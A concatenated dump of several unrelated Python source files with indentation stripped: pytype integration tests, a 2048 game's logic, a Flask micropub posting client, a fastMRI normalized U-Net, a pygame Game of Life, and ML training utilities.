self._CheckTypesAndErrors("tokenerror2.py", ["python-compiler-error"])
def testComplex(self):
self._CheckTypesAndErrors("complex.py", [])
def testCheck(self):
self._CheckTypesAndErrors("simple.py", [])
def testReturnType(self):
self._CheckTypesAndErrors(self._MakePyFile("""\
def f() -> int:
return "foo"
"""), ["bad-return-type"])
def testUsageError(self):
self._SetUpChecking(self._MakePyFile("""\
def f():
pass
"""))
# Set up a python version mismatch
self.pytype_args["--python_version"] = "3.4"
self.pytype_args["--output-errors-csv"] = self.errors_csv
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testSkipFile(self):
filename = self._MakePyFile("""\
# pytype: skip-file
""")
self.pytype_args[self._DataPath(filename)] = self.INCLUDE
self.pytype_args["--output"] = "-"
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=True, stderr=False, returncode=False)
self.assertInferredPyiEquals(expected_pyi=self.DEFAULT_PYI)
def testInfer(self):
self._InferTypesAndCheckErrors("simple.py", [])
self.assertInferredPyiEquals(filename="simple.pyi")
def testInferPytypeErrors(self):
self._InferTypesAndCheckErrors(
"bad.py", ["unsupported-operands", "name-error"])
self.assertInferredPyiEquals(filename="bad.pyi")
def testInferCompilerError(self):
self._InferTypesAndCheckErrors("syntax.py", ["python-compiler-error"])
self.assertInferredPyiEquals(expected_pyi=self.DEFAULT_PYI)
def testInferComplex(self):
self._InferTypesAndCheckErrors("complex.py", [])
self.assertInferredPyiEquals(filename="complex.pyi")
def testCheckMain(self):
self._SetUpChecking(self._MakePyFile("""\
def f():
name_error
def g():
"".foobar
g()
"""))
self.pytype_args["--main"] = self.INCLUDE
self.pytype_args["--output-errors-csv"] = self.errors_csv
self._RunPytype(self.pytype_args)
self.assertHasErrors("attribute-error")
def testInferToFile(self):
self.pytype_args[self._DataPath("simple.py")] = self.INCLUDE
pyi_file = self._TmpPath("simple.pyi")
self.pytype_args["--output"] = pyi_file
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
with open(pyi_file, "r") as f:
pyi = f.read()
with open(self._DataPath("simple.pyi"), "r") as f:
expected_pyi = f.read()
self.assertTrue(self._ParseString(pyi).ASTeq(
self._ParseString(expected_pyi)))
def testParsePyi(self):
self.pytype_args[self._DataPath("complex.pyi")] = self.INCLUDE
self.pytype_args["--parse-pyi"] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
def testPytree(self):
"""Test pytype on a real-world program."""
self.pytype_args["--quick"] = self.INCLUDE
self._InferTypesAndCheckErrors("pytree.py", [
"import-error", "import-error", "attribute-error", "attribute-error",
"attribute-error", "name-error"])
ast = self._ParseString(self.stdout)
self.assertListEqual(["convert", "generate_matches", "type_repr"],
[f.name for f in ast.functions])
self.assertListEqual(
["Base", "BasePattern", "Leaf", "LeafPattern", "NegatedPattern", "Node",
"NodePattern", "WildcardPattern"],
[c.name for c in ast.classes])
def testNoAnalyzeAnnotated(self):
filename = self._MakePyFile("""\
def f() -> str:
return 42
""")
self._InferTypesAndCheckErrors(self._DataPath(filename), [])
def testAnalyzeAnnotated(self):
filename = self._MakePyFile("""\
def f() -> str:
return 42
""")
self.pytype_args["--analyze-annotated"] = self.INCLUDE
self._InferTypesAndCheckErrors(self._DataPath(filename),
["bad-return-type"])
def testRunPytype(self):
"""Basic unit test (smoke test) for _run_pytype."""
# TODO(kramm): This is a unit test, whereas all other tests in this file
# are integration tests. Move this somewhere else?
infile = self._TmpPath("input")
outfile = self._TmpPath("output")
with open(infile, "w") as f:
f.write("def f(x): pass")
argv = ["-o", outfile, infile]
options = config.Options(argv)
main_module._run_pytype(options)
self.assertTrue(os.path.isfile(outfile))
def testGenerateAndUseBuiltins(self):
"""Test for --generate-builtins."""
filename = self._TmpPath("builtins.pickle")
# Generate builtins pickle
self.pytype_args["--generate-builtins"] = filename
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
self.assertTrue(os.path.isfile(filename))
src = self._MakePyFile("""\
import __future__
import sys
import collections
import typing
""")
# Use builtins pickle
self._ResetPytypeArgs()
self._SetUpChecking(src)
self.pytype_args["--precompiled-builtins"] = filename
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
def testUseBuiltinsAndImportMap(self):
"""Test for --generate-builtins."""
filename = self._TmpPath("builtins.pickle")
# Generate builtins pickle
self.pytype_args["--generate-builtins"] = filename
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
self.assertTrue(os.path.isfile(filename))
# input files
canary = "import pytypecanary" if typeshed.Typeshed.MISSING_FILE else ""
src = self._MakePyFile("""\
import __future__
import sys
import collections
import typing
import foo
import csv
import ctypes
import xml.etree.ElementTree as ElementTree
import md5
%s
x = foo.x
y = csv.writer
z = md5.new
""" % canary)
pyi = self._MakeFile("""\
import datetime
x = ... # type: datetime.tzinfo
""", extension=".pyi")
# Use builtins pickle with an imports map
self._ResetPytypeArgs()
self._SetUpChecking(src)
self.pytype_args["--precompiled-builtins"] = filename
self.pytype_args["--imports_info"] = self._MakeFile("""\
typing /dev/null
foo %s
""" % pyi, extension="")
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
def testBuiltinsDeterminism2(self):
f1, f2 = self._GenerateBuiltinsTwice("2.7")
self.assertBuiltinsPickleEqual(f1, f2)
def testBuiltinsDeterminism3(self):
f1, f2 = self._GenerateBuiltinsTwice("3.6")
self.assertBuiltinsPickleEqual(f1, f2)
def testTimeout(self):
# Note: At the time of this writing, pickling builtins takes well over one
# second (~10s). If it ever was to get faster, this test would become flaky.
self.pytype_args["--timeout"] = 1
self.pytype_args["--generate-builtins"] = self._TmpPath("builtins.pickle")
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=True)
def main():
unittest.main()
if __name__ == "__main__":
main()
|
python
|
#!/usr/bin/env python
import argparse
def main(args):
"""
This is some doc
"""
print(args)
def sub_function():
"""
Here is some doc about this sub function
"""
pass
def parse_arguments():
parser = argparse.ArgumentParser(description="")
parser.add_argument("-t", "--type", default=False)
return parser.parse_args()
if __name__ == "__main__":
args = parse_arguments()
main(args)
|
python
|
while (True):
print("mohammed uddin made changes")
print(":D")
|
python
|
# logic.py to be
import random
global actual_score
def start_game():
# declaring an empty list then
# appending 4 list each with four
# elements as 0.
mat = []
for i in range(4):
mat.append([0] * 4)
# calling the function to add
# a new 2 in grid after every step
add_new_2(mat)
return mat
# function to add a new 2 in
# grid at any random empty cell
def add_new_2(mat):
# choosing a random index for
# row and column.
r = random.randint(0, 3)
c = random.randint(0, 3)
counter = 0
# while loop will break as the
# random cell chosen will be empty
# (or contains zero)
while ((mat[r][c] != 0) & (counter<50)):
r = random.randint(0, 3)
c = random.randint(0, 3)
counter = counter + 1
# we will place a 2 at that empty
# random cell.
if counter < 50:
mat[r][c] = 2
return mat
# function to get the current
# state of game
def get_current_state(mat):
# if any cell contains
# 2048 we have won
for i in range(4):
for j in range(4):
if (mat[i][j] == 2048):
return 'WON'
# if we are still left with
# atleast one empty cell
# game is not yet over
for i in range(4):
for j in range(4):
if (mat[i][j] == 0):
return 'GAME NOT OVER'
# or if no cell is empty now
# but if after any move left, right,
# up or down, if any two cells
# gets merged and create an empty
# cell then also game is not yet over
for i in range(3):
for j in range(3):
if (mat[i][j] == mat[i + 1][j] or mat[i][j] == mat[i][j + 1]):
return 'GAME NOT OVER'
for j in range(3):
if (mat[3][j] == mat[3][j + 1]):
return 'GAME NOT OVER'
for i in range(3):
if (mat[i][3] == mat[i + 1][3]):
return 'GAME NOT OVER'
# else we have lost the game
return 'LOST'
# all the functions defined below
# are for left swap initially.
# function to compress the grid
# after every step before and
# after merging cells.
def compress(mat):
# bool variable to determine
# any change happened or not
changed = False
# empty grid
new_mat = []
# with all cells empty
for i in range(4):
new_mat.append([0] * 4)
# here we will shift entries
# of each cell to it's extreme
# left row by row
# loop to traverse rows
for i in range(4):
pos = 0
# loop to traverse each column
# in respective row
for j in range(4):
if (mat[i][j] != 0):
# if cell is non empty then
# we will shift it's number to
# previous empty cell in that row
# denoted by pos variable
new_mat[i][pos] = mat[i][j]
if (j != pos):
changed = True
pos += 1
# returning new compressed matrix
# and the flag variable.
return new_mat, changed
# function to merge the cells
# in matrix after compressing
def merge(mat):
changed = False
score = 0
for i in range(4):
for j in range(3):
# if current cell has same value as
# next cell in the row and they
# are non empty then
if (mat[i][j] == mat[i][j + 1] and mat[i][j] != 0):
# double current cell value and
# empty the next cell
mat[i][j] = mat[i][j] * 2
mat[i][j + 1] = 0
score = mat[i][j] + score
# make bool variable True indicating
# the new grid after merging is
# different.
changed = True
#actual_score = score
return mat, changed, score
# function to reverse the matrix
# means reversing the content of
# each row (reversing the sequence)
def reverse(mat):
new_mat = []
for i in range(4):
new_mat.append([])
for j in range(4):
new_mat[i].append(mat[i][3 - j])
return new_mat
# function to get the transpose
# of matrix means interchanging
# rows and column
def transpose(mat):
new_mat = []
for i in range(4):
new_mat.append([])
for j in range(4):
new_mat[i].append(mat[j][i])
return new_mat
# function to update the matrix
# if we move / swipe left
def move_left(grid):
# first compress the grid
new_grid, changed1 = compress(grid)
# then merge the cells.
new_grid, changed2, score = merge(new_grid)
changed = changed1 or changed2
# again compress after merging.
new_grid, temp = compress(new_grid)
# return new matrix and bool changed
# telling whether the grid is same
# or different
return new_grid, changed, score
# function to update the matrix
# if we move / swipe right
def move_right(grid):
# to move right we just reverse
# the matrix
new_grid = reverse(grid)
# then move left
new_grid, changed, score = move_left(new_grid)
# then again reverse matrix will
# give us desired result
new_grid = reverse(new_grid)
return new_grid, changed, score
# function to update the matrix
# if we move / swipe up
def move_up(grid):
# to move up we just take
# transpose of matrix
new_grid = transpose(grid)
# then move left (calling all
# included functions) then
new_grid, changed, score = move_left(new_grid)
# again take transpose will give
# desired results
new_grid = transpose(new_grid)
return new_grid, changed, score
# function to update the matrix
# if we move / swipe down
def move_down(grid):
# to move down we take transpose
new_grid = transpose(grid)
# move right and then again
new_grid, changed, score = move_right(new_grid)
# take transpose will give desired
# results.
new_grid = transpose(new_grid)
return new_grid, changed, score
# this file only contains all the logic
# functions to be called in main function
# present in the other file
|
python
|
import os
from flask import request, render_template, redirect, session, Blueprint, flash, jsonify, abort, send_from_directory
from werkzeug.utils import secure_filename
import indieweb_utils
from bs4 import BeautifulSoup
import requests
from config import ENDPOINT_URL, TWITTER_BEARER_TOKEN, UPLOAD_FOLDER, MEDIA_ENDPOINT_URL, CLIENT_ID
client = Blueprint("client", __name__, static_folder="static", static_url_path="")
@client.route("/", methods=["GET", "POST"])
def index():
if session.get("access_token"):
user = session["access_token"]
me = session["me"]
else:
user = None
me = None
if request.method == "POST":
if user:
url = request.form["url"]
if request.form["action"] == "update":
return redirect(f"/update?url={url}")
elif request.form["action"] == "delete":
if session.get("scope") and not "delete" in session.get("scope").split(" "):
flash("You do not have permission to update posts.")
return redirect("/")
http_request = requests.post(
ENDPOINT_URL,
json={
"type": ["h-entry"],
"action": "delete",
"url": url
},
headers={
"Authorization": f"Bearer {user}"
}
)
if http_request.status_code == 200 or http_request.status_code == 201:
flash(f"Your {url} post was successfully deleted.")
else:
flash(http_request.json()["message"].strip("."))
return render_template("user/dashboard.html", user=user, me=me, title="WriteIt Home", action="delete")
elif request.form["action"] == "undelete":
if session.get("scope") and not "undelete" in session.get("scope").split(" "):
flash("You do not have permission to undelete posts.")
return redirect("/")
http_request = requests.post(
ENDPOINT_URL,
json={
"type": ["h-entry"],
"action": "undelete",
"url": url
},
headers={
"Authorization": f"Bearer {user}"
}
)
if http_request.status_code == 200 or http_request.status_code == 201:
flash(f"Your {url} post was successfully undeleted.")
else:
flash(http_request.json()["message"].strip("."))
return render_template(
"user/dashboard.html",
user=user,
me=me,
title="WriteIt Home",
action="undelete"
)
return redirect("/")
abort(403)
if user is not None:
return render_template(
"user/dashboard.html",
user=user,
me=me,
title="WriteIt Dashboard",
action=None
)
else:
return render_template(
"index.html",
user=user,
me=me,
title="Home WriteIt",
action=None
)
@client.route("/post", methods=["GET", "POST"])
def create_post():
if session.get("access_token"):
user = session["access_token"]
me = session["me"]
else:
return redirect("/login")
post_type = request.args.get("type")
request_type = None
accepted_post_types = (
("like", "like-of"),
("repost", "repost-of"),
("bookmark", "bookmark-of"),
("rsvp", "rsvp"),
("reply", "in-reply-to"),
("checkin", ""),
("checkin", ""),
("photo", ""),
("watch", "")
)
for item in accepted_post_types:
post, attribute = item
if post_type == post:
title = f"Create a {post.title()} Post"
url = request.args.get(attribute)
request_type = attribute
if post_type == "photo" and "media" not in session.get("scope").split(" "):
flash("You need to grant the 'media' scope to upload photos.")
return redirect("/")
if request.method == "POST":
form_encoded = request.form.to_dict()
if form_encoded.get("access_token"):
del form_encoded["access_token"]
if request.form.get("preview") and not request.form.get("in-reply-to"):
post_type = None
if request.form.get("like-of"):
return redirect(f"/post?type=like&like-of={request.form.get('like-of')}&is_previewing=true")
if request.form.get("bookmark-of"):
return redirect(f"/post?type=bookmark&bookmark-of={request.form.get('bookmark-of')}&is_previewing=true")
if request.form.get("repost-of"):
return redirect(f"/post?type=repost&repost-of={request.form.get('repost-of')}&is_previewing=true")
if me and user:
data = {
"type": ["h-entry"],
"properties": {}
}
form_types = ["in-reply-to", "like-of", "repost-of", "bookmark-of", "watch-of"]
for key in form_encoded:
if key in form_types:
del form_encoded["h"]
del form_encoded["action"]
data["properties"][key] = [form_encoded]
url = form_encoded[key]
request_type = key
break
if request.form.get("syndication") and request.form.get("syndication") != "none":
data["syndication"] = [request.form.get("syndication")]
if request.form.get("category") == "RSVP":
data["p-rsvp"] = {}
data["p-rsvp"]["properties"] = {
"event_name": request.form.get("event_name"),
"in-reply-to": request.form.get("in-reply-to"),
"state": request.form.get("state"),
"content": [request.form.get("content")],
"event_date": request.form.get("event_date"),
"event_time": request.form.get("event_time")
}
elif request.form.get("venue_name"):
data["properties"] = {"checkin": [{"properties": {}}]}
data["properties"] = {
"checkin": [
{
"properties": {
"name": request.form.get("venue_name"),
"latitude": request.form.get("latitude"),
"longitude": request.form.get("longitude")
}
}
]
}
if request.form.get("content"):
data["properties"]["checkin"][0]["properties"]["content"] = [request.form.get("content")]
if not request.form.get("venue_name") or not request.form.get("latitude") or not request.form.get("longitude"):
flash("Please enter a valid venue name, latitude, and longitude value.")
return render_template("post/create_post.html", title=title, post_type=post_type, user=user, me=me)
else:
if request.form.get("title"):
data["properties"]["title"] = [request.form.get("title")]
if request.form.get("content"):
data["properties"]["content"] = [request.form.get("content")]
if request.form.get("category"):
data["properties"]["category"] = request.form.get("category").split(", ")
if request.form.get("is_hidden"):
data["properties"]["is_hidden"] = [request.form.get("is_hidden")]
if request.form.get("content") and BeautifulSoup(request.form.get("content"), "lxml") and BeautifulSoup(request.form.get("content"), "lxml").find():
data["properties"]["content"] = [{"html": request.form.get("content")}]
elif request.form.get("content") and request.form.get("content") is not None:
data["properties"]["content"] = [request.form.get("content")]
photo = request.files.get("photo")
if photo:
photo.save(os.path.join(UPLOAD_FOLDER, secure_filename(photo.filename)))
# if session.get("config"):
# photo_r = requests.post(session["config"]["media-endpoint"], files={"file": (secure_filename(photo.filename),open(os.path.join(UPLOAD_FOLDER, secure_filename(photo.filename)), "rb"), 'image/jpeg')}, headers={"Authorization": "Bearer " + user})
# else:
photo_http_request = requests.post(
MEDIA_ENDPOINT_URL,
files={
"file": (
secure_filename(photo.filename),
open(os.path.join(UPLOAD_FOLDER, secure_filename(photo.filename)), "rb"),
'image/jpeg'
)
},
headers={
"Authorization": "Bearer " + user
}
)
check_for_alt_text = False
if photo:
data["properties"]["photo"] = [{ "value": photo_http_request.headers["Location"] }]
check_for_alt_text = True
if check_for_alt_text and request.form.get("image_alt_text"):
data["properties"]["photo"][0]["alt"] = request.form.get("image_alt_text")
if request.form.get("format") == "form_encoded":
form_encoded["h"] = "entry"
categories = []
if form_encoded.get("category") and len(form_encoded.get("category").split(", ")) > 0:
for i in form_encoded.get("category").replace(", ", ",").split(","):
categories += [i]
form_encoded["category[]"] = categories
http_request = requests.post(ENDPOINT_URL, data=form_encoded, headers={"Authorization": f"Bearer {user}"})
else:
http_request = requests.post(ENDPOINT_URL, json=data, headers={"Authorization": f"Bearer {user}"})
try:
response = http_request.json()["message"]
except:
response = http_request.text
if http_request.status_code != 200 and http_request.status_code != 201:
flash("Error: " + str(response))
if http_request.headers.get("Location"):
return redirect(http_request.headers["Location"])
flash("Your post was successfully created.")
title = "Create Post"
return render_template("post/create_post.html", title=title, post_type=post_type, user=user, me=me)
return jsonify({"error": "You must be logged in to create a post."}), 401
if request_type is not None and url:
site_supports_webmention, h_entry = indieweb_utils.get_reply_context(url, twitter_bearer_token=TWITTER_BEARER_TOKEN)
else:
h_entry = None
site_supports_webmention = False
is_previewing = False
if request.args.get("is_previewing") and request.args.get("is_previewing") == "true":
is_previewing = True
return render_template(
"post/create_post.html",
title=title,
post_type=post_type,
user=user,
me=me,
url=url,
h_entry=h_entry,
site_supports_webmention=site_supports_webmention,
is_previewing=is_previewing
)
@client.route("/update", methods=["GET", "POST"])
def update_post():
post_id = request.args.get("url")
if session.get("access_token"):
user = session["access_token"]
me = session["me"]
else:
return redirect("/login")
if session.get("scope") and not "update" in session.get("scope").split(" "):
flash("You do not have permission to update posts.")
return redirect("/")
if "/checkin/" in post_id:
post_type = "checkin"
elif "/rsvp/" in post_id:
post_type = "rsvp"
elif "/webmentions/" in post_id:
post_type = "reply"
else:
post_type = "note"
try:
properties = requests.get(ENDPOINT_URL + "?q=source&url=" + post_id,
headers={"Authorization": f"Bearer {user}"})
properties = properties.json()
except:
abort(404)
title = "Update a Post"
if request.method == "POST":
if me and user:
data = {
"action": "update",
"url": post_id,
"replace": {}
}
if request.form.get("title"):
data["replace"]["title"] = [request.form.get("title")]
else:
data["replace"]["title"] = ""
if request.form.get("content"):
data["replace"]["content"] = [request.form.get("content")]
else:
data["replace"]["content"] = []
if request.form.get("image_alt_text"):
data["replace"]["image_alt_text"] = request.form.get("image_alt_text")
else:
data["replace"]["image_alt_text"] = ""
if request.form.get("category"):
data["replace"]["category"] = request.form.get("category")
if request.form.get("is_hidden"):
data["replace"]["is_hidden"] = [request.form.get("is_hidden")]
if post_type == "rsvp":
data["p-rsvp"] = {}
data["p-rsvp"]["properties"] = {
"in-reply-to": properties["properties"]["in-reply-to"],
"rsvp": request.form.get("rsvp"),
"state": request.form.get("state"),
"content": [request.form.get("content")],
"event_date": request.form.get("event_date"),
"event_time": request.form.get("event_time")
}
elif request.form.get("in-reply-to"):
data["in-reply-to"] = request.form.get("in-reply-to")
http_request = requests.post(ENDPOINT_URL, json=data, headers={
"Authorization": f"Bearer {user}", "Content-Type": "application/json"
})
try:
response = http_request.json()
if http_request.status_code != 200 and http_request.status_code != 201:
flash("Error: " + str(response["message"]))
else:
return redirect(http_request.headers["Location"])
except:
flash("There was an unknown server errohttp_request.")
return render_template(
"post/update_post.html",
title=title,
post_type=post_type,
user=user, me=me,
id=post_id,
properties=properties
)
return jsonify({"error": "You must be logged in to create a post."}), 401
return render_template(
"post/update_post.html",
title=title,
post_type=post_type,
user=user, me=me,
id=id,
properties=properties
)
@client.route("/settings")
def settings():
if session.get("access_token"):
user = session["access_token"]
me = session["me"]
if session.get("syndication"):
syndication = session["syndication"]
else:
syndication = None
else:
return redirect("/login")
client_id = CLIENT_ID.strip("/")
return render_template(
"user/settings.html",
title="Settings",
user=user,
me=me,
syndication=syndication,
client_id=client_id
)
@client.route("/schemas")
def schemas():
if session.get("access_token"):
user = session["access_token"]
me = session["me"]
else:
return redirect("/login")
return render_template(
"user/schemas.html",
title="Schemas",
user=user,
me=me
)
# use this to forward client-side uploads from /post?type=photo to the /media micropub endpoint
@client.route("/media-forward", methods=["POST"])
def forward_media_query():
if not session.get("access_token"):
return redirect("/login")
photo = request.files.get("photo")
if not photo:
flash("No photo was uploaded. Please upload a photo and try again.")
return redirect("/post?type=photo")
if not session.get("access_token"):
return jsonify({"error": "You must be logged in to upload a photo."}), 401
if request.form.get("filename"):
filename = secure_filename(request.form.get("filename").replace("..", ""))
else:
filename = secure_filename(photo.filename.replace("..", ""))
photo.save(os.path.join(UPLOAD_FOLDER, filename))
http_request = requests.post(
MEDIA_ENDPOINT_URL,
files={
"file": (
filename,
open(os.path.join(UPLOAD_FOLDER, filename), "rb"),
'image/jpeg'
)
},
headers={
"Authorization": f"Bearer {session['access_token']}"
}
)
if http_request.status_code != 201:
flash("Error: " + str(http_request.json()["message"]))
return redirect("/post?type=photo")
location_header = http_request.headers["Location"]
return redirect(location_header)
@client.route("/robots.txt")
def robots():
return send_from_directory(client.static_folder, "robots.txt")
@client.route("/favicon.ico")
def favicon():
return send_from_directory(client.static_folder, "favicon.ico")
@client.route("/emojis.json")
def emojis():
return send_from_directory(client.static_folder, "emojis.json")
@client.route("/manifest.json")
def web_app_manifest():
return send_from_directory("static", "manifest.json")
@client.route("/emoji_autocomplete.js")
def emoji_autocomplete():
return send_from_directory(client.static_folder, "js/emoji_autocomplete.js")
|
python
|
"""Docstring for varnet.py
Normalized U-Net implemetnation for unrolled block network.
"""
import math
from typing import List, Tuple
import fastmri
import torch
import torch.nn as nn
import torch.nn.functional as F
from fastmri.data import transforms
from unet import MHUnet
from att_unet import AttUnet
class NormUnet(nn.Module):
"""PyTorch implementation of a Normalized U-Net model.
This is the same as a regular U-Net, but with normalization applied to the
input before the U-Net. This keeps the values more numerically stable
during training.
Initialization Parameters
-------------------------
chans : int
Number of output channels of the first convolution layer.
num_pools : int
Number of down-sampling and up-sampling layers.
in_chans : int
Number of channels in the input to the U-Net model.
out_chans : int
Number of channels in the output to the U-Net model.
drop_prob : float
Dropout probability.
which_unet : str
One of [trueshare, mhushare, attenshare, split]
task_count : int
Number of dataset tasks
Forward Parameters
------------------
image : tensor
4D tensor
int_task : int
i.e. 0 for div_coronal_pd_fs, 1 for div_coronal_pd
Returns
-------
4D tensor
References
----------
https://github.com/facebookresearch/fastMRI/tree/master/fastmri/models
"""
def __init__(
self,
chans: int,
num_pools: int,
in_chans: int = 2,
out_chans: int = 2,
drop_prob: float = 0.0,
which_unet: str = 'user input required',
task_count: int = None,
):
super().__init__()
assert which_unet in ['trueshare', 'mhushare', 'attenshare', 'split'], "variable which_unet not supported"
if which_unet == 'trueshare' or which_unet == 'split':
decoder_heads = 1
elif which_unet == 'mhushare' or which_unet == 'attenshare':
assert task_count > 1, 'no. tasks must be int > 1 for mhu or att unet'
decoder_heads = task_count
# attentional network is a separate module
if which_unet == 'attenshare':
self.unet = AttUnet(
in_chans = in_chans,
out_chans = out_chans,
chans = chans,
num_pool_layers = num_pools,
drop_prob = drop_prob,
decoder_heads = decoder_heads,
)
# trueshare, mhushare, and split all use the same network
# Differentiation between the three happens in MHUnet or VarNet_MTL
else:
self.unet = MHUnet(
in_chans = in_chans,
out_chans = out_chans,
chans = chans,
num_pool_layers = num_pools,
drop_prob = drop_prob,
decoder_heads = decoder_heads,
)
def complex_to_chan_dim(self, x: torch.Tensor) -> torch.Tensor:
b, c, h, w, two = x.shape
assert two == 2
return x.permute(0, 4, 1, 2, 3).reshape(b, 2 * c, h, w)
def chan_complex_to_last_dim(self, x: torch.Tensor) -> torch.Tensor:
b, c2, h, w = x.shape
assert c2 % 2 == 0
c = c2 // 2
return x.view(b, 2, c, h, w).permute(0, 2, 3, 4, 1).contiguous()
def norm(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor]:
# group norm
b, c, h, w = x.shape
x = x.view(b, 2, c // 2 * h * w)
mean = x.mean(dim=2).view(b, c, 1, 1)
std = x.std(dim=2).view(b, c, 1, 1)
x = x.view(b, c, h, w)
return (x - mean) / std, mean, std
def unnorm(
self, x: torch.Tensor, mean: torch.Tensor, std: torch.Tensor
) -> torch.Tensor:
return x * std + mean
def pad(
self, x: torch.Tensor
) -> Tuple[torch.Tensor, Tuple[List[int], List[int], int, int]]:
"""Ensure that dimensions match after rounding errors incurred
during upsampling/downsampling by padding.
"""
_, _, h, w = x.shape
w_mult = ((w - 1) | 15) + 1
h_mult = ((h - 1) | 15) + 1
w_pad = [math.floor((w_mult - w) / 2), math.ceil((w_mult - w) / 2)]
h_pad = [math.floor((h_mult - h) / 2), math.ceil((h_mult - h) / 2)]
# TODO: fix this type when PyTorch fixes theirs
# the documentation lies - this actually takes a list
# https://github.com/pytorch/pytorch/blob/master/torch/nn/functional.py#L3457
# https://github.com/pytorch/pytorch/pull/16949
x = F.pad(x, w_pad + h_pad)
return x, (h_pad, w_pad, h_mult, w_mult)
def unpad(
self,
x: torch.Tensor,
h_pad: List[int],
w_pad: List[int],
h_mult: int,
w_mult: int,
) -> torch.Tensor:
return x[..., h_pad[0] : h_mult - h_pad[1], w_pad[0] : w_mult - w_pad[1]]
def forward(
self,
x: torch.Tensor,
int_task: int = 0,
) -> torch.Tensor:
if not x.shape[-1] == 2:
raise ValueError("Last dimension must be 2 for complex.")
# get shapes for unet and normalize
x = self.complex_to_chan_dim(x)
x, mean, std = self.norm(x)
x, pad_sizes = self.pad(x)
x = self.unet(
x, int_task = int_task,
)
# get shapes back and unnormalize
x = self.unpad(x, *pad_sizes)
x = self.unnorm(x, mean, std)
x = self.chan_complex_to_last_dim(x)
return x
|
python
|
import pygame
import numpy as np
from time import sleep
class GameOfLife:
def __init__(self):
pygame.init()
self.size = 800
self.divisions = 100
self.length = self.size // self.divisions
self.screen = pygame.display.set_mode((self.size, self.size))
self.fps = 120
self.interval = 10
self.counter = 0
self.color_bg = (25, 25, 25)
self.color_fg = (230, 230, 230)
self.cells = np.full((self.divisions, self.divisions), False, dtype=bool)
self.paused = False
def play(self):
clock = pygame.time.Clock()
self.draw()
pygame.display.update()
while True:
self.counter += 1
clock.tick(self.fps)
self.draw()
pygame.display.update()
for event in pygame.event.get():
if event.type == pygame.QUIT:
quit()
keys = pygame.key.get_pressed()
if keys[pygame.K_ESCAPE]:
self.paused = not self.paused
self.draw()
pygame.display.update()
sleep(0.2)
if self.paused:
if pygame.mouse.get_pressed()[0]:
pos = pygame.mouse.get_pos()
pos = [pos[0] // self.length, pos[1] // self.length]
self.cells[pos[0], pos[1]] = not self.cells[pos[0], pos[1]]
continue
if self.counter % (self.fps // self.interval) == 0:
neighbors_count = np.full((self.divisions + 2, self.divisions + 2), 0, dtype=np.int8)
for i in range(self.divisions):
for j in range(self.divisions):
if self.cells[i, j]:
for i2 in range(i, i+3):
for j2 in range(j, j+3):
neighbors_count[i2, j2] += 1
neighbors_count[i+1, j+1] -= 1
for i in range(self.divisions):
for j in range(self.divisions):
if self.cells[i, j]:
if neighbors_count[i+1, j+1] not in {2, 3}:
self.cells[i, j] = False
else:
if neighbors_count[i+1, j+1] == 3:
self.cells[i, j] = True
def draw(self):
pygame.draw.rect(
self.screen,
self.color_bg,
pygame.Rect(0, 0, self.size, self.size)
)
for i in range(self.divisions):
for j in range(self.divisions):
if self.cells[i, j]:
pygame.draw.rect(
self.screen,
self.color_fg,
pygame.Rect(i * self.length, j * self.length, self.length, self.length)
)
if __name__ == "__main__":
obj = GameOfLife()
obj.play()
|
python
|
import numpy as np
import torch
import torchvision
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from sklearn.manifold import TSNE
import os
from .model import resnet
from PIL import ImageFilter
import random
def adjust_learning_rate(args, optimizer, epoch, lr):
# if args.cosine:
# eta_min = lr * (args.lr_decay_rate ** 3)
# lr = eta_min + (lr - eta_min) * (
# 1 + math.cos(math.pi * epoch / args.epochs)) / 2
# else:
steps = np.sum(epoch > np.asarray(args.lr_decay_epochs))
if steps > 0:
lr = lr * (args.lr_decay_rate ** steps)
for param_group in optimizer.param_groups:
param_group['lr'] = lr
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def accuracy(output, target, topk=(1,)):
"""Computes the accuracy over the k top predictions for the specified values of k"""
with torch.no_grad():
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)
res.append(correct_k.mul_(100.0 / batch_size))
return res
def ERG(arr, k=2):
arr_clone = arr.copy()
arr_sum = arr_clone.sum(axis=0)
index = np.argsort(arr_sum)[-k:]
for i in index:
arr_clone[i] = 0
arr_clone[:, i] = 0
arr_sum = arr_clone.sum(axis=0)
return arr_sum.argmax(), index
def get_tsne_feature(model, loader, device, opt):
model.eval()
with torch.no_grad():
for idx, (image, label, room_name, image_name) in enumerate(loader):
if torch.cuda.is_available():
image = image.to(device)
label = label.to(device)
if opt.mode == 'label':
feat, _ = model(image)
elif opt.mode == 'self':
feat, _ = model(image)
feat = feat.detach().cpu().numpy()
label = label.cpu().numpy()
room_name = np.array(room_name)
image_name = np.array(image_name)
sim = np.matmul(feat, feat.T)
np.fill_diagonal(sim, 0)
index = sim.sum(axis=0).argmax()
new_index, ex = ERG(sim, 3)
print(image_name[index], image_name[new_index])
print(image_name[ex])
if idx == 0:
tsne_data = feat
tsne_label = label
tsne_room_name = room_name
tsne_image_name = image_name
else:
tsne_data = np.concatenate((tsne_data, feat), axis=0)
tsne_label = np.concatenate((tsne_label, label), axis=0)
tsne_room_name = np.concatenate((tsne_room_name, room_name), axis=0)
tsne_image_name = np.concatenate((tsne_image_name, image_name), axis=0)
